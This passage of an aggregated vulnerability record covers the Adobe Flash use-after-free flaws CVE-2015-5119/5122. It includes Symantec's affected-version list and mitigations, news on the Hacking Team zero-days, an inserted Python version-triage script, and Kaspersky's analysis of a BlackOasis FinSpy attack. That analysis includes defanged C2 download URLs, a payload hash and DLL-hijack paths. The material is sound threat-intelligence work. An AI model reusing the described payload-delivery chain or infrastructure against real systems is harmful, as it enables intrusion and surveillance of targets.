10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 
10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 
11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 
11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash 
Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 2 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe 
Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151.0 \n * Adobe Flash Player 9.0.152.0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary EUS 6.6.z \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Redhat RHEL Desktop Supplementary Client 5 \n * Redhat RHEL Supplementary Server 5 \n * SuSE openSUSE Evergreen 11.4 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. 
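The affected-version data above comes in two shapes: CPE 2.3 names of the form cpe:2.3:a:adobe:flash_player:<version>:*:... and Symantec's flat list of product names. The Metasploit module, for its part, gates its Flash check on version ceilings: at most 18.0.0.194 on Windows, and an 11.x build at most 11.2.202.468 on Linux. Comparing dotted build numbers as strings is a classic triage bug ("9.0.112.0" sorts after "18.0.0.194"). The following is an added example, not code from the module or from any of the advisories: it parses CPE 2.3 names, compares versions component-wise, and reproduces the module's two-target predicate. The sample input is constructed here from names on this page plus two Flash builds above the module's ceilings.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, Tuple

# Version ceilings copied from the Metasploit module's :flash requirement above.
MSF_WINDOWS_MAX = "18.0.0.194"
MSF_LINUX_MAX = "11.2.202.468"

# Constructed sample input: CPE 2.3 names from the list above, one Adobe AIR
# name (listed by Symantec, but not a module target), and two Flash builds
# above the module's ceilings (not taken from the page's list).
SAMPLE_CPES = [
    "cpe:2.3:a:adobe:flash_player:18.0.0.194:*:*:*:*:*:*:*",
    "cpe:2.3:a:adobe:flash_player:11.2.202.468:*:*:*:*:*:*:*",
    "cpe:2.3:a:adobe:flash_player:13.0.0.292:*:*:*:*:*:*:*",
    "cpe:2.3:a:adobe:air:18.0.0.144:*:*:*:*:*:*:*",
    "cpe:2.3:a:adobe:flash_player:18.0.0.209:*:*:*:*:*:*:*",
    "cpe:2.3:a:adobe:flash_player:11.2.202.481:*:*:*:*:*:*:*",
]


@dataclass(frozen=True)
class Cpe23:
    part: str
    vendor: str
    product: str
    version: str


def parse_cpe23(name: str) -> Cpe23:
    """Split a CPE 2.3 formatted string into its first four meaningful fields.

    The format is 'cpe:2.3:' followed by eleven colon-separated components;
    a literal colon inside a component is escaped as backslash-colon, so the
    split must only happen on unescaped colons.
    """
    fields = re.split(r"(?<!\\):", name)
    if len(fields) != 13 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 formatted string: {name!r}")
    return Cpe23(part=fields[2], vendor=fields[3], product=fields[4], version=fields[5])


def version_key(ver: str) -> Tuple[int, ...]:
    """Turn a dotted build number into an int tuple so comparison is numeric."""
    if not re.fullmatch(r"\d+(\.\d+)*", ver):
        raise ValueError(f"unparseable version: {ver!r}")
    return tuple(int(p) for p in ver.split("."))


def version_le(a: str, b: str) -> bool:
    """a <= b, component-wise, padding the shorter version with zeros."""
    ka, kb = version_key(a), version_key(b)
    width = max(len(ka), len(kb))
    return ka + (0,) * (width - len(ka)) <= kb + (0,) * (width - len(kb))


def in_msf_scope(ver: str, platform: str) -> bool:
    """Reproduce the module's per-target Flash check for 'win' or 'linux'."""
    if platform == "win":
        return version_le(ver, MSF_WINDOWS_MAX)
    if platform == "linux":
        # The module's Linux target only accepts 11.x builds (its /^11\./ check).
        return ver.startswith("11.") and version_le(ver, MSF_LINUX_MAX)
    return False


def triage(cpe_names: Iterable[str], platform: str) -> Dict[str, bool]:
    """Map each adobe:flash_player version in the input to the module's verdict."""
    verdicts: Dict[str, bool] = {}
    for name in cpe_names:
        cpe = parse_cpe23(name)
        if (cpe.part, cpe.vendor, cpe.product) != ("a", "adobe", "flash_player"):
            continue  # other products (e.g. Adobe AIR) are out of the module's scope
        verdicts[cpe.version] = in_msf_scope(cpe.version, platform)
    return verdicts


if __name__ == "__main__":
    for plat in ("win", "linux"):
        print(plat, triage(SAMPLE_CPES, plat))
```

Note that a build can be "in scope" for the module and still be absent from the CPE list above, and vice versa: the module's predicate is a ceiling, while the CPE and Symantec lists enumerate specific builds, so the two should be used together rather than interchangeably.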
\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "symantec", "title": "Adobe Flash Player ActionScript 3 ByteArray Use After Free Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2015-5122"], "modified": "2015-07-07T00:00:00", "id": "SMNTC-75568", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/75568", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:19", "description": "[](<https://3.bp.blogspot.com/-qllvndzYpes/VZ5mlZ4rLxI/AAAAAAAAjeU/W_yymRKV2Ns/s1600/Hacking-Team-Flash-Zero-Day.jpg>)\n\nThe corporate data leaked in the [recent cyber attack](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>) on the infamous surveillance software firm [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>) has 
revealed that the **_Adobe Flash zero-day_** (CVE-2015-5119) exploit has already been added to several exploit kits.\n\nSecurity researchers at Trend Micro have discovered evidence of the **_Adobe Flash zero-day (CVE-2015-5119) exploit_** being used in a number of exploit kits before the vulnerability was publicly revealed in this week's data breach at the spyware company.\n\nSuccessful exploitation of the zero-day Flash vulnerability could cause a system crash, potentially allowing an attacker to take full control of the affected system.\n\n### Adobe Flash Zero-Day Targeted Japan and Korea\n\nAccording to the researchers, the zero-day exploit, which the rest of the world only gained access to on Monday, was apparently used in limited cyber attacks on **South Korea** and **Japan**.\n\n> _\"In late June, [Trend Micro] learned that a user in Korea was the attempted target of various exploits, including a Flash vulnerability (CVE-2014-0497) discovered last year,\" _Weimin Wu, threat analyst at Trend Micro [wrote](<http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-tied-to-attacks-in-korea-and-japan-on-july-1/>). \n \n_\"Traffic logs indicate the user may have received spear-phishing emails with attached documents\u2026contained a URL for the user to visit. This URL led to a site hosted in the United States, which [included] a Flash exploit, detected as SWF_EXPLOYT.YYKI. 
This particular exploit targets the zero-day Adobe vulnerability that was disclosed during the [Hacking Team leak](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>).\"_\n\nThe zero-day exploit downloads a Trojan onto the victim's computer, which in turn downloads several other malicious payloads onto the infected system.\n\nResearchers say the zero-day exploit code they came across was very similar to the exploit code revealed as part of the [Hacking Team data breach](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>). This suggests the attack was conducted by someone with access to the tools and services offered by Hacking Team.\n\nAdobe has since [released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) addressing this Adobe Flash zero-day (CVE-2015-5119) vulnerability and advises users to install the update as soon as possible.\n", "cvss3": {}, "published": "2015-07-09T01:20:00", "type": "thn", "title": "Hacking Team Flash Zero-Day Linked to Cyber Attacks on South Korea and Japan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0497"], "modified": "2015-07-09T12:20:50", "id": "THN:F6B79957FA6EFD8F9C60F4A8646CCE04", "href": "https://thehackernews.com/2015/07/Hacking-Team-Flash-Zero-Day.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:18", "description": "[](<https://1.bp.blogspot.com/-PU0YupNvZZA/VaIFHQRy0zI/AAAAAAAAjgo/0gofhn0tdLM/s1600/flash-player-exploit.jpg>)\n\nAnother Flash zero-day exploit has emerged from the [hundreds of gigabytes of data recently leaked](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>) from **Hacking Team**, an Italian surveillance software company that has long been accused of selling spying software to governments and intelligence agencies.\n\nThe critical zero-day vulnerability in 
Adobe Flash is a **use-after-free programming flaw** ([CVE-2015-5122](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122>)) which is similar to the [CVE-2015-5119 Flash vulnerability patched](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>) last week and allows an attacker to hijack vulnerable computers.\n\nAdobe says attackers are apparently already exploiting this vulnerability, for which no patch exists yet. It is the second time in a single week that the company has had to work on a fix for a zero-day vulnerability in its Flash Player software.\n\n### Flash Zero-Day Flaw in the Wild\n\nThe exploit code for this flaw is already available online, allowing an attacker to remotely execute malicious code on victims' computers and install malware, Adobe said in an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-04.html>) published late Friday.\n\n> \"Successful exploitation [of the CVE-2015-5122 flaw] could cause a crash and potentially allow an attacker to take control of the affected system,\" Adobe said.\n\nThe zero-day vulnerability is present in the **_latest Adobe Flash Player version 18.0.0.204 and earlier versions for Windows, Linux and OS X_**.\n\nAdobe credited FireEye researcher **Dhanesh Kizhakkinan** for reporting the vulnerability documented in the stolen data leaked from [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>).\n\nOnce again, we advise everyone with Flash installed to remove or disable the software until the company patches the critical security bug.\n", "cvss3": {}, "published": "2015-07-11T20:34:00", "type": "thn", "title": "Second Flash Player Zero-day Exploit found in 'Hacking Team' Dump", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5123", "CVE-2015-5119", "CVE-2015-5122"], "modified": "2015-07-12T07:34:08", "id": "THN:81AF218D527E626B7FE15454B68E5FF0", "href": 
"https://thehackernews.com/2015/07/hacking-flash-player-exploit.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2017-10-16T15:16:55", "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero-day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We reported the bug to Adobe, which assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)\n\nSo far only one attack has been observed in our customer base, leading us to believe that the attacks are few in number and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was responsible for another zero-day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. 
The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server. Although the exact payload of the attack was no longer in the C&C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. 
Some lure documents used in these attacks are shown below:

Decoy documents used in BlackOasis attacks

To summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:

 * CVE-2015-5119 - June 2015
 * CVE-2016-0984 - June 2015
 * CVE-2016-4117 - May 2016
 * CVE-2017-8759 - Sept 2017
 * CVE-2017-11292 - Oct 2017

## Attacks Leveraging CVE-2017-11292

The attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within the document is an ActiveX object which contains the Flash exploit.

**Flash object in the .docx file, stored in uncompressed format**

The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.

**Unpacking routine for SWF exploit**

The exploit is a memory corruption vulnerability that exists in the "**com.adobe.tvsdk.mediacore.BufferControlParameters**" class. If the exploit is successful, it gains arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.

The first stage shellcode contains an interesting NOP sled with alternative instructions, most likely designed this way to avoid detection by antivirus products looking for large NOP blocks inside Flash files:

NOP sled composed of 0x90 and 0x91 opcodes

The main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.

**Second stage shellcode**

The second stage shellcode will then perform the following actions:

 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe
 2. Download a lure document to display to the victim from the same IP
 3. Execute the payload and display the lure document

### Payload - mo.exe

As mentioned earlier, the "mo.exe" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, including a custom packer and a virtual machine to execute code.

The PCODE of the virtual machine is packed with the aplib packer.

**Part of packed VM PCODE**

After unpacking, the PCODE looks like the following:

**Unpacked PCODE**

After unpacking, the virtual machine PCODE is then decrypted:

**Decrypted VM PCODE**

The custom virtual machine supports a total of 34 instructions:

**Example of parsed PCODE**

In this example, the "1b" instruction is responsible for executing native code that is specified in the parameter field.

Once the payload is successfully executed, it will proceed to copy files to the following locations:

 * C:\ProgramData\ManagerApp\AdapterTroubleshooter.exe
 * C:\ProgramData\ManagerApp\15b937.cab
 * C:\ProgramData\ManagerApp\install.cab
 * C:\ProgramData\ManagerApp\msvcr90.dll
 * C:\ProgramData\ManagerApp\d3d9.dll

The "AdapterTroubleshooter.exe" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The "d3d9.dll" file is malicious and is loaded into memory by the legitimate binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.

**Part of injected code in winlogon process**

The payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. Most recently, one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.

## Targeting and Victims

BlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.

Victims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.

## Conclusions

We estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. Additionally, Gamma had two years to recover from the attack and pick up the pace.

We believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here, will continue to grow.

What does this mean for everyone, and how can one defend against such attacks, including zero-day exploits?

